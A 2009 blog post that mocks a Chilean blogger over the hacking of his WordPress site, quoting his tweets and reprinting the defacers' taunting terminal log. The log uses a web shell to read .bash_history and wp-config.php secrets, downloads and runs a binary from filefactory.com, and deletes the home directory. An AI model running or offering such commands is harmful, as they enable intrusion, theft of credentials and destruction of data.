Leo Prieto: Hacked Again

On Saturday, August 8, 2009, while Leo Prieto was celebrating Betazeta's birthday and trying to forget the earlier hacks of Betazeta, today of all days, and as a gift for being so likeable and humble, he got hacked. Here is what he said on his Twitter:

  • The bastards deleted everything, time to go look for backups. They should get themselves a woman and put their knowledge to something more productive!
  • Thanks to everyone for the support, especially @franvarela for calling me and @tomaspollak for helping me fix everything.
  • OBVIOUSLY my username and password are NOT “adm”. They do that to make fun of me. Yes, I WAS hacked, but I don't know how.
  • For fuck's sake, you lifeless bastards. What do you gain by hacking my personal site? It's not even on Betazeta's servers!
  • [FW] Happy 12:34:56 7/8/9! Happy 1st year of Betazeta!: Quick! While this minute lasts, take the chance to hac.. http://bit.ly/IIo2G
    6:17 PM Aug 7th from twitterfeed
  • At the Betasado celebrating 1 year of @Betazeta – http://twitpic.com/d2jdq
    4:29 PM Aug 7th from Tweetie

Oh, I almost forgot: Happy Birthday :)

In any case, this group should make a video like in the old days. I remember this one:

All Your Base Are Belong To Us

You can also watch Hitler finding out about the Betazeta hack,
and here is the evidence of the hack:

====== t1nky_w1nky - d1psy - l44_l44 - p0 ========
======        special guest: b4rney       ========
#      ######  ####  #    # #    # ###### #####
#      #      #    # #    # ##   # #      #    #
#      #####  #    # #    # # #  # #####  #    #
#      #      #    # # ## # #  # # #      #    #
#      #      #    # ##  ## #   ## #      #    #
###### ######  ####  #    # #    # ###### #####
=========== 00000000000000000000000 =============

h4ppy macoy123456789 b1rthd4y!
dud3 y3st3rd4y w4s 12:34:56 7/8/9 w00000000t!

ch3ck this out:::
- http://www.holachc.com
- http://aavchile.cl
- http://www.begin.cl
- http://www.bootlog.cl/
- http://nicoykatiushka.org/works
- http://nicoykatiushka.org/blog02
- http://nicoykatiushka.org/beijing798
- http://www.luzymario.com
- http://leo.prie.to

[b4rney@m4chine]$ python l30-pr13t0.py --host leo.prie.to
====== 0day wp exploit ========
---------- l0adding .... -----------
> WP detected.
> login: /wp-login.php
> Checking ... Vulnerable!
[----------------------------------------] 100%
user: adm pass: adm
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --user adm --pass adm
..............................................
..............................................
..............................................
>> g0t sh3ll?
try http://leo.prie.to/anonysh3ll.php?command
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "id && whoami && uname -a"
uid=99(www-data) gid=100(mysql) groups=100(mysql)
www-data
Linux infong463 2.6.28.8-20090428g-filemon-idmap-grsec #1 SMP Tue Apr 28 17:25:03 CEST 2009 i686 GNU/Linux
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "ls -1a"
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "cat .bash_history"
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "find . -name wp-config.php -exec grep -H ^define {} \;"
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "cat evidencia"

/* LOL Evidencia? WTF!!! */

[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "wget -O /tmp/done http://filefactory.com/?id=8383476 -o /dev/null"
[b4rney@m4chine]$ perl wp2shell.pl http://leo.prie.to --execute "chmod +x /tmp/done && /tmp/done && rm -rf /tmp/done"
Deleting $HOME ....................................................................
[b4rney@m4chine]$
